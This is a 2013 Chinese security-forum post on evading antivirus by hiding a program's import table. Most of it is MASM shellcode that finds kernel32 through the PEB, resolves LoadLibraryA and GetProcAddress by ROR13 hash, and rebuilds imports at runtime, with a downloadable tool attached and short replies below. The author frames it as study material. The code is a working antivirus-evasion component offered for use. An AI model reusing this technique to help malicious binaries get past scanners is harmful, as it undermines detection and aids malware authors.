[原创]导入表静态特征免杀-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]导入表静态特征免杀

发表于: 2013-7-6 18:43 8325

[原创]导入表静态特征免杀

kanghtta

2013-7-6 18:43

8325

好久没来这逛了，放个09年写的小工具。
其实静态免杀主要涉及特征定位，PE文件格式。loader机制，PE变形技术，掌握上面这些基础之后可以说基于特征定位的查杀基本就沦为鸡肋。09年研究各杀软的静态检测能力时，写了这个小工具。现在放出来给有需要的同学一起学习，交流，望勿用于其它用途。

shellcode功能（当时只在xp上测试）：
动态加载PE文件导入表中的所有函数：
目前导入地址为正常导入地址，其中，程序只需要4字节定位导入表的位置，
因此可任意存放原导入表RVA

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

.386
.model  flat,stdcall
option casemap:none
     
include windows.inc
 
 
.code
 
 
start:
        assume  fs:nothing
        mov     edx,dword ptr fs:[30h]
        mov     eax,dword ptr[edx+0Ch]
        mov     esi,dword ptr[eax+1Ch]
        lods    dword ptr[esi]
        mov     edi,dword ptr[eax+8]   ;已经取得kernel32.dll基地址
     
        push     ebp
        mov     ebp,esp
        sub     esp,200h
         
        mov     dword ptr [ebp - 04],   edi
         
        push    0EC0E4E8Eh                      
        push    dword ptr [ebp - 04]
        call    GetApiAddress 
         
        mov     dword ptr [ebp- 08],    eax     ;LoadLibraryA  ebp-08
         
        push    7C0DFCAAh                       
        push    dword ptr [ebp - 04]
        call    GetApiAddress 
         
        mov     dword ptr [ebp - 0ch],  eax     ;GetProcAddress ebp -0c
         
        push    0D3324904h                  
        push    dword ptr [ebp - 04]
        call    GetApiAddress 
         
        mov     dword ptr [ebp -10h],   eax     ;GetMoudleHandle ebp-10
         
        push    NULL
        call    dword ptr [ebp -10h]
         
        mov     dword ptr [ebp-14h],    eax    ;hMoudle send ebp -14
         
         
        pushad
        mov     esi,dword ptr [ebp -14h]
        add     esi,dword ptr [esi + 3ch]
        assume  esi:ptr IMAGE_NT_HEADERS
        mov     esi,[esi].OptionalHeader.DataDirectory[8].VirtualAddress
        add     esi,dword ptr [ebp -14h]
        assume  esi:ptr IMAGE_IMPORT_DESCRIPTOR
        .while  [esi].OriginalFirstThunk || [esi].TimeDateStamp || [esi].ForwarderChain \
                [esi].Name1 || [esi].FirstThunk
                .if     [esi].OriginalFirstThunk
                 
                    mov     ebx,[esi].OriginalFirstThunk
                    add     ebx,dword ptr [ebp -14h]
                    mov     edi,[esi].Name1
                    add     edi,dword ptr [ebp -14h]
                     
                    push    edi
                    call    dword ptr [ebp -08]
                     
                    mov     edi,eax                 ;edi为Import对应的dll模块句柄
                    mov     edx,[esi].FirstThunk
                    add     edx,dword ptr [ebp -14h]
                     
                     
                .else
                    mov     ebx,[esi].FirstThunk
                    add     ebx,dword ptr [ebp -14h]            ;定位firstThunk数组
                    mov     edi,[esi].Name1
                    add     edi,dword ptr [ebp -14h]
                     
                    push    edi
                    call    dword ptr [ebp -08h]
                     
                    mov     edi,eax                 ;edi为Import对应的dll模块句柄
                    mov     edx,[esi].FirstThunk
                    add     edx,dword ptr [ebp -14h]
             
                .endif
                     
                .while      dword   ptr [ebx]
                    .if     dword   ptr [ebx] & IMAGE_ORDINAL_FLAG32     ;按序号导入
                            push    edx
                            mov     eax,dword ptr [ebx]
                            and     eax,0FFFFh
                            push    eax
                            push    edi
                            call    dword ptr [ebp -0ch]
                            pop     edx
                            mov     dword ptr [edx],eax
                         
 
                    .else
                     
                            mov     eax,dword ptr [ebx]
                            add     eax,dword ptr [ebp -14h]
                            push    edx
                            assume  eax:ptr IMAGE_IMPORT_BY_NAME
                            add     eax,2
                            push    eax
                            push    edi
                            call    dword   ptr [ebp -0ch]
                            pop     edx
                            mov     dword ptr [edx],eax
                         
                    .endif
                    add     ebx,4
                    add     edx,4
                .endw
                 
                add esi,sizeof  IMAGE_IMPORT_DESCRIPTOR
        .endw
     
        popad
     
        add esp ,200
        leave
 
 
GetApiAddress   proc    KernelBaseAddress:dword, EncryptNum:dword
 
    LOCAL   ReturnValue:dword 
    pushad
    mov edi,KernelBaseAddress
    mov eax,dword ptr[edi+3ch]
    mov edx,dword ptr[edi+eax+78h] ;IMAGE_EXPORT_DIRECTORY
    add edx,edi
 
    mov ecx,dword ptr[edx+18h]  ;名称导出的函数总数
    mov ebx,dword ptr[edx+20h]  ;函数名地址表
    add ebx,edi
     
    push edx       ;保存edx
     
NotFound:   
    jecxz   ExitGetApi
    dec ecx
    mov esi,dword ptr[ebx+ecx*4]  ;从最后一个函数名开始查找   Address of names
    add esi,edi
     
    xor eax,eax
    cdq
LoopChar:   
    lods    byte ptr[esi]
    test al,al
    je CharEnd
    ror edx,0dh       ;对字符串进行hash运算
    add edx,eax
    jmp LoopChar
CharEnd:
    cmp edx,EncryptNum
    jnz NotFound
     
    pop edx       ; 恢复edx
     
    mov ebx,dword ptr[edx+24h] ; 函数序号表  Address of name ordinals
    add ebx,edi 
    mov cx,word ptr[ebx+ecx*2] ; 找到了函数的序号
    mov ebx,dword ptr[edx+1ch] ; 函数地址表
    add ebx,edi
    add edi,dword ptr[ebx+ecx*4] ;由序号得出函数的rva
         
    mov ReturnValue,edi 
ExitGetApi: 
    popad
    mov eax,ReturnValue
    ret
GetApiAddress   endp
 
end start

登录后可查看完整内容

[注意]看雪招聘，专注安全领域的专业人才平台！

上传的附件：

ReImport.7z （19.08kb，94次下载）

收藏・9

免费・5

支持

赞赏记录

参与人

雪币

留言

时间

心游尘世外

为你点赞~

2024-5-31 05:32

QinBeast

为你点赞~

2024-5-31 05:25

飘零丶

为你点赞~

2024-4-3 00:38

shinratensei

为你点赞~

2024-2-15 00:11

PLEBFE

为你点赞~

2023-3-7 00:31

最新回复 (5)
dayang 雪币： 220 活跃值： (851) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 940 粉丝 1 关注私信	dayang 2 楼不错，前来支持 2013-7-6 21:07 0
loveqqc 雪币： 276 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 226 粉丝 0 关注私信	loveqqc 3 楼什么年代了，还玩免杀？ 2013-7-7 06:22 0
Rookietp 雪币： 1042 活跃值： (630) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 798 粉丝 2 关注私信	Rookietp 4 楼流氓的年代~ 2013-7-7 10:14 0
yyyang 雪币： 822 活跃值： (284) 能力值： ( LV3，RANK：30 ) 在线值：发帖 17 回帖 86 粉丝 0 关注私信	yyyang 5 楼先mark一下值得学习 2013-7-8 01:00 0
BlackSnake 雪币： 93 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 44 粉丝 0 关注私信	BlackSnake 1 6 楼 MARK一下下... 2013-7-9 00:21 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

kanghtta

发帖

225

回帖

500

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
dayang 雪币： 220 活跃值： (851) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 940 粉丝 1 关注私信	dayang 2 楼不错，前来支持 2013-7-6 21:07 0
loveqqc 雪币： 276 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 226 粉丝 0 关注私信	loveqqc 3 楼什么年代了，还玩免杀？ 2013-7-7 06:22 0
Rookietp 雪币： 1042 活跃值： (630) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 798 粉丝 2 关注私信	Rookietp 4 楼流氓的年代~ 2013-7-7 10:14 0
yyyang 雪币： 822 活跃值： (284) 能力值： ( LV3，RANK：30 ) 在线值：发帖 17 回帖 86 粉丝 0 关注私信	yyyang 5 楼先mark一下值得学习 2013-7-8 01:00 0
BlackSnake 雪币： 93 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 44 粉丝 0 关注私信	BlackSnake 1 6 楼 MARK一下下... 2013-7-9 00:21 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]导入表静态特征免杀

账号登录 验证码登录

账号登录

验证码登录